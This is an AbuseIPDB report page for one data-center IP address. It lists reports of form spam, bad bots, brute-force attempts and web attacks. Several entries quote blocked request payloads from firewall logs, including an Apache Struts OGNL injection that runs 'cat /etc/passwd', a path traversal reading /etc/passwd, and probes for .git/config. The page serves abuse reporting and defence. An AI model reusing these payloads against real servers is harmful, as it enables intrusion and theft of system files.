JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 43.245.119.37

43.245.119.37 was found in our database!

This IP was reported 26 times. Confidence of Abuse is 0%: ?

ISP	trafficforce, UAB
Usage Type	Data Center/Web Hosting/Transit
ASN	AS264617
Domain Name	trafficforce.lt
Country	🇨🇭 Switzerland
City	Zurich, Zurich

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 43.245.119.37

Whois 43.245.119.37

IP Abuse Reports for 43.245.119.37:

This IP address has been reported a total of 26 times from 9 distinct sources. 43.245.119.37 was first reported on October 30th 2023, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2024-10-27 02:39:12 (1 year ago)	(mod_security) mod_security (id:210730) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210730) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Oct 26 22:39:05.109783 2024] [security2:error] [pid 12718:tid 12993] [client 43.245.119.37:50649] [client 43.245.119.37] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|ftp.kettlehill.net\|F\|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.kettlehill.net"] [uri "/admin/errors.log"] [unique_id "Zx2nyZ85zGOejZziaFRoJgAAAI8"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-09-03 18:45:18 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 03 14:44:59.212956 2024] [security2:error] [pid 25047:tid 25047] [client 43.245.119.37:60561] [client 43.245.119.37] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "120"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.stdavids-media.com"] [uri "/assets../.git/config"] [unique_id "ZtdZK2AzgBdRYO8ZcO3c_gAAAAU"] show less	Brute-Force Bad Web Bot Web App Attack
🇦🇺 MAGIC	2024-08-05 09:04:13 (1 year ago)	VM1 Bad user agents ignoring web crawling rules. Draing bandwidth	DDoS Attack Bad Web Bot
🇺🇸 TPI-Abuse	2024-07-27 20:23:32 (1 year ago)	(mod_security) mod_security (id:211190) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:211190) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 27 16:23:09.312429 2024] [security2:error] [pid 22622:tid 22630] [client 43.245.119.37:47163] [client 43.245.119.37] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt\|\|autodiscover.kettlehill.net\|F\|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.kettlehill.net"] [uri "/horde/util/barcode.php"] [unique_id "ZqVXLT1IczihROHRlilqRAAAAMU"] show less	Brute-Force Bad Web Bot Web App Attack
🇩🇪 ps-center	2024-07-16 00:39:53 (1 year ago)	SS1: Web Attack GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@j ... show more SS1: Web Attack GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action show less	Web Spam Hacking Bad Web Bot Web App Attack
Anonymous	2024-05-22 02:34:43 (2 years ago)	Common attack or app scan event detected and blocked	Port Scan Hacking Web App Attack
🇪🇸 10dencehispahard SL	2024-05-08 07:00:43 (2 years ago)	Unauthorized login attempts []	Brute-Force
🇪🇸 10dencehispahard SL	2024-05-08 06:52:10 (2 years ago)	Web Attack	DDoS Attack Brute-Force Web App Attack
🇦🇺 oncord	2024-05-07 09:43:11 (2 years ago)	Form spam	Web Spam
🇺🇸 oncord	2024-05-06 03:05:11 (2 years ago)	Form spam	Web Spam
🇦🇺 oncord	2024-05-01 18:41:04 (2 years ago)	Form spam	Web Spam
🇺🇸 TPI-Abuse	2024-05-01 10:39:33 (2 years ago)	(mod_security) mod_security (id:210381) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210381) triggered by 43.245.119.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed May 01 06:39:29.676049 2024] [security2:error] [pid 27240:tid 46944975513344] [client 43.245.119.37:55903] [client 43.245.119.37] ModSecurity: Access denied with code 403 (phase 2). Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/12_HTTP_Protocol.conf"] [line "82"] [id "210381"] [rev "6"] [msg "COMODO WAF: URL Encoding Abuse Attack Attempt\|\|autodiscover.kettlehill.net\|F\|4"] [data "REQUEST_URI=/assets/built%2F..%2F..%2F%E0%A4%A/package.json"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] [hostname "autodiscover.kettlehill.net"] [uri "/assets/built%2F..%2F..%2F%E0%A4%A/package.json"] [unique_id "ZjIb4QWn9geulJ7mEbMaHAAAAQY"] show less	Brute-Force Bad Web Bot Web App Attack
🇨🇭 backslash	2024-05-01 03:51:16 (2 years ago)		Web Spam
🇦🇺 MAGIC	2024-04-28 03:11:02 (2 years ago)	VM1 Bad user agents ignoring web crawling rules. Draing bandwidth	DDoS Attack Bad Web Bot
🇦🇺 oncord	2024-04-27 12:00:28 (2 years ago)	Form spam	Web Spam

Showing 1 to 15 of 26 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 213.255.241.114

🇬🇧 193.163.125.157

🇲🇽 187.174.238.116

🇮🇳 122.161.170.148

🇩🇪 103.14.32.192

🇩🇪 91.107.184.21

🇳🇱 91.92.42.34

🇨🇳 59.110.171.136

🇺🇸 54.225.156.95

🇺🇸 45.33.7.4

🇺🇸 34.236.41.241

🇺🇸 34.139.45.87

🇸🇬 8.222.161.200

🇺🇸 217.21.77.156

🇦🇺 35.197.181.173

🇧🇪 34.62.35.107

🇨🇳 27.17.197.90

🇨🇳 1.95.120.92

🇳🇱 176.65.149.220

🇺🇸 172.253.242.49